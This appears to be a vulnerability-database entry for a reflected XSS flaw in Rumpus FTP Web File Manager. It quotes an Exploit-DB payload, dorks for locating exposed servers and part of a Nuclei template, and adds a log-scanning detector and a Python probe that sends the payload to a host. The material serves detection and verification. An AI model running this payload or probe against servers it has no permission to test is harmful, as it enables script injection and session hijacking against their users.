CVE-2019-19368
Published 2019-12-16
Priority P3 (49) · medium · 6.1 (CVSS 3.1)
Public exploit available · EPSS 21.02% (97.3rd percentile)
A reflected cross-site scripting vulnerability was discovered in the Login page of Rumpus FTP Web File Manager 8.2.9.1. An attacker can exploit it by sending a crafted link to end users and execute arbitrary JavaScript in their browser.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| maxum | rumpus | — | — |
Detection & IOCs (extracted from sources)
- A Google dork can be used to identify exposed Rumpus FTP Web File Manager instances
- A Shodan dork can be used to identify Rumpus FTP servers by their HTTP Server header
- The XSS payload is reflected via the Login page query string; monitor HTTP GET requests to /Login whose query string contains script-injection patterns such as SVG/onload event handlers (decode percent-encoding before matching, since the same payload can arrive raw or encoded)
- The detection template checks for an HTTP 200 response to a GET request to /Login with the crafted XSS payload in the query string; a 200 alone is not proof, the payload must come back unescaped in an HTML body
- The vulnerability is confirmed only on version 8.2.9.1; other versions are not specified as affected
- The exploit was tested on both Windows and Mac platforms
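The log-monitoring bullet above, as an added example that is not part of this advisory, the Exploit-DB entry or the Nuclei template: a scanner for Apache/NGINX combined-format access logs that isolates requests to /Login, percent-decodes the query string (repeatedly, so double-encoded probes normalise too) and flags SVG/onload and similar injection patterns. The log lines are constructed for this example and do not come from a real Rumpus server; the pattern names and the combined log format are assumptions.

```python
"""Flag reflected-XSS probes against the Rumpus Web File Manager /Login page in access logs.

Added example, not from the advisory or the vendor. Assumes Apache/NGINX combined log format;
the sample lines below are constructed for this example and do not come from a real server.
"""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). Lines 1, 2 and 5 carry probes:
# the Exploit-DB payload raw, the same payload percent-encoded, and a plain <script> probe.
SAMPLE_LOG = r"""
203.0.113.7 - - [14/Dec/2019:10:01:02 +0000] "GET /Login?!'><sVg/OnLoAD=alert`1`// HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Dec/2019:10:01:05 +0000] "GET /Login?%21%27%3E%3CsVg%2FOnLoAD%3Dalert%601%60%2F%2F HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
198.51.100.4 - - [14/Dec/2019:10:02:10 +0000] "GET /Login?login=alice HTTP/1.1" 200 1980 "-" "Mozilla/5.0"
198.51.100.9 - - [14/Dec/2019:10:03:00 +0000] "GET /Files/report.pdf HTTP/1.1" 200 88211 "-" "curl/7.64.1"
192.0.2.33 - - [14/Dec/2019:10:04:44 +0000] "GET /Login?%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 2311 "-" "python-requests/2.22.0"
"""

# Combined log format: client, identd, user, [time], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Patterns matched against the fully decoded query string (case-insensitive).
# Names are assumptions for this example, not signature IDs from any product.
XSS_PATTERNS = {
    "svg_event_handler": re.compile(r"<\s*svg[\s/][^>]*\bon\w+\s*=", re.I),
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "generic_event_handler": re.compile(r"[\s/\"']on(load|error|focus|mouseover)\s*=", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
}


def decode_query(query: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are normalised as well."""
    for _ in range(rounds):
        decoded = unquote(query)
        if decoded == query:
            break
        query = decoded
    return query


def classify_request(target: str):
    """Return (decoded_query, pattern_name) if the request is a /Login XSS probe, else None."""
    path, _, query = target.partition("?")
    if path.lower() != "/login" or not query:
        return None
    decoded = decode_query(query)
    for name, pattern in XSS_PATTERNS.items():
        if pattern.search(decoded):
            return decoded, name
    return None


def scan_log(log_text: str) -> list[dict]:
    """Parse combined-format lines and return one finding per suspicious /Login request."""
    findings = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hit = classify_request(m["target"])
        if hit is None:
            continue
        decoded, name = hit
        findings.append({
            "ip": m["ip"],
            "time": m["time"],
            "status": int(m["status"]),
            "pattern": name,
            "decoded_query": decoded,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} [{f['pattern']}] {f['decoded_query']}")
```

Matching on the decoded query rather than the raw request line is the point: the second sample line is the same payload as the first, only percent-encoded, and a signature written against the literal `<sVg/OnLoAD=` would miss it.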
CVSS provenance
- NVD, CVSS v3.1: 6.1 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
- NVD, CVSS v2.0: 4.3 MEDIUM (AV:N/AC:M/Au:N/C:N/I:P/A:N)
No detection rules found.
Exploit-DB
Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
exploitdb · 2019-12-18 · CVSS 6.1
---
# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
# Google Dork: site:*.*.com "Web File Manager" inurl:?login=
# Shodan Dork: Server: Rumpus
# Date: 2019-12-14
# Exploit Author: Harshit Shukla, Sudeepto Roy
# Vendor Homepage: https://www.maxum.com/
# Tested On: Windows & Mac
# Version: 8.2.9.1
# CVE: CVE-2019-19368
Description:
A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager.
PoC:
Payload: ?!'><sVg/OnLoAD=alert`1`//
Solution:
Update to the latest version released by vendor.
Nuclei
Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
nuclei · CVSS 6.1
Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
Template:
id: CVE-2019-19368
info:
  name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
  author: madrobot
  severity: medium
  description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defac
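The check that the Exploit-DB PoC and the Nuclei template perform, as an added example that is neither of those artifacts: send GET /Login?<payload> and classify the reply. It uses the payload from the Exploit-DB entry, but unlike a bare status-code match it distinguishes an unescaped reflection (exploitable) from an entity-encoded one (reflected but safe) and from no reflection at all. The sample response bodies are constructed for this example and are not real Rumpus output; the category names and the `probe` helper are assumptions.

```python
"""Verify whether a Rumpus /Login page reflects a query-string payload unescaped.

Added example, not the Exploit-DB PoC or the Nuclei template. An HTTP 200 alone does not
prove the bug; the payload has to come back verbatim inside an HTML body. The sample bodies
below are constructed for this example and are not real Rumpus responses.
"""
import html
import sys
from urllib.error import HTTPError
from urllib.parse import quote
from urllib.request import Request, urlopen

# Payload from the Exploit-DB entry for CVE-2019-19368.
EXPLOITDB_PAYLOAD = "!'><sVg/OnLoAD=alert`1`//"

# Constructed responses: an unescaped reflection (vulnerable), an HTML-escaped reflection
# (reflected but safe) and a body that does not echo the query string at all.
SAMPLE_VULNERABLE_BODY = (
    '<html><body><form action="/Login?' + EXPLOITDB_PAYLOAD
    + '" method="post"><input name="user"></form></body></html>'
)
SAMPLE_ESCAPED_BODY = (
    '<html><body><form action="/Login?' + html.escape(EXPLOITDB_PAYLOAD, quote=True)
    + '" method="post"><input name="user"></form></body></html>'
)
SAMPLE_PLAIN_BODY = '<html><body><form action="/Login" method="post"></form></body></html>'


def classify_reflection(status: int, content_type: str, body: str, payload: str) -> str:
    """Classify one response for a payload sent in the query string.

    'vulnerable'           raw payload present in a 200 text/html body (the XSS condition)
    'reflected_unconfirmed' raw payload present, but not a 200 HTML page (needs a manual look)
    'escaped'              payload present only with < > ' " entity-encoded (not exploitable as-is)
    'not_reflected'        nothing of the payload in the body
    """
    is_html = "text/html" in content_type.lower()
    if payload in body:
        return "vulnerable" if (status == 200 and is_html) else "reflected_unconfirmed"
    if html.escape(payload, quote=True) in body:
        return "escaped"
    return "not_reflected"


def probe(base_url: str, payload: str = EXPLOITDB_PAYLOAD, timeout: float = 10.0) -> str:
    """GET <base_url>/Login?<payload> against a host you are authorised to test and classify it."""
    url = base_url.rstrip("/") + "/Login?" + quote(payload, safe="")
    req = Request(url, headers={"User-Agent": "CVE-2019-19368-reflection-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            status = resp.status
            ctype = resp.headers.get("Content-Type", "")
            body = resp.read().decode("utf-8", errors="replace")
    except HTTPError as err:  # 4xx/5xx still carry a body worth classifying
        status = err.code
        ctype = err.headers.get("Content-Type", "")
        body = err.read().decode("utf-8", errors="replace")
    return classify_reflection(status, ctype, body, payload)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))  # e.g. python check.py http://rumpus.example:8000
    else:
        for label, body in (("unescaped", SAMPLE_VULNERABLE_BODY),
                            ("escaped", SAMPLE_ESCAPED_BODY),
                            ("plain", SAMPLE_PLAIN_BODY)):
            print(label, "->", classify_reflection(200, "text/html", body, EXPLOITDB_PAYLOAD))
```

The `escaped` outcome is the one a 200-only check gets wrong: a patched page can still echo the query string, entity-encoded, and return 200, which is not exploitable.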
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html
- https://github.com/harshit-shukla/CVE-2019-19368/
- https://www.maxum.com/Rumpus/Download.html
Published: 2019-12-16